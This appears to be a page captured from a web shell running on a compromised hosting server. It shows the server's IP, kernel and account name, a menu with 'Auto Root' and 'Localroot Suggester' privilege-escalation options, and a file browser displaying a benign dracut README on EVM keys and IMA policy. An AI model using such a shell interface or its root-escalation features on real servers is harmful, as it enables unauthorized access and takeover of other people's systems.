Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
dracut /
modules.d /
98integrity /
Delete
Unzip
Name
Size
Permission
Date
Action
README
2.93
KB
-rw-r--r--
2022-06-19 22:35
evm-enable.sh
4.7
KB
-rwxr-xr-x
2025-06-11 16:03
ima-keys-load.sh
1.46
KB
-rwxr-xr-x
2022-06-19 22:35
ima-policy-load.sh
1.03
KB
-rwxr-xr-x
2022-06-19 22:35
module-setup.sh
371
B
-rwxr-xr-x
2022-06-19 22:35
Save
Rename
# Directions for creating the encrypted key that will be used to initialize # the EVM software. # Create the EVM key (encrypted key type) # # The encrypted key is a random number encrypted/decrypted using the # kernel master key. The encrypted key is only exposed to userspace # as an encrypted datablob. $ keyctl add encrypted evm-key "new trusted:kmk-trusted 32" @u 782117972 # Save the encrypted key $ su -c 'keyctl pipe `keyctl search @u encrypted evm-key` > /etc/keys/evm-trusted.blob' # The EVM key path name can be set in one of the following ways (specified in # the order in which the variable is overwritten): 1) use the default value: -------------------------------------------------------------------------- EVMKEY="/etc/keys/evm-trusted.blob" -------------------------------------------------------------------------- 2) create the configuration file '/etc/sysconfig/evm' and set the EVMKEY variable; 3) specify the EVM key path name in the 'evmkey=' parameter of the kernel command line. # Directions for loading a custom IMA policy. # Write the policy following the instructions provided in the file # 'Documentation/ABI/testing/ima_policy' of the kernel documentation. # Save the policy in a file. # Create the configuration file '/etc/sysconfig/ima' to override the path name of # the IMA custom policy. ------------- '/etc/sysconfig/ima' (with the default value) ------------- IMAPOLICY="/etc/sysconfig/ima-policy" ------------------------------------------------------------------------- # Information on loading distro, third party or local keys on the trusted IMA keyring # Loading distro, third party or local keys on the trusted IMA keyring requires # creating a local certificate authority(local-CA), installing the local-CA's # public key on the system-keyring and signing the certificates with the local-CA # key. # # Many directions for creating a mini certificate authority exist on the web # (eg. openssl, yubikey). (Reminder: safely storing the private key offline is # really important, especially in the case of the local-CA's private key.) The # local-CA's public key can be loaded onto the system keyring either by building # the key into the kernel or, on Fedora, storing it in the UEFI/Mok keyring. (As # of writing, the patches for loading the UEFI/Mok keys on the system-keyring # have not been upstreamed.) # # To view the system keyring: keyctl show %keyring:.system_keyring # # Most on-line directions for signing certificates requires creating a Certificate # Signing Request (CSR). Creating such a request requires access to the private # key, which would not be available when signing distro or 3rd party certificates. # Openssl provides the "-ss_cert" option for directly signing certificates. # 98integrity/ima-keys-load.sh script loads the signed certificates stored # in the $IMAKEYSDIR onto the trusted IMA keyring. The default $IMAKEYSDIR # directory is /etc/keys/ima, but can be specified in the /etc/sysconfig/ima # policy.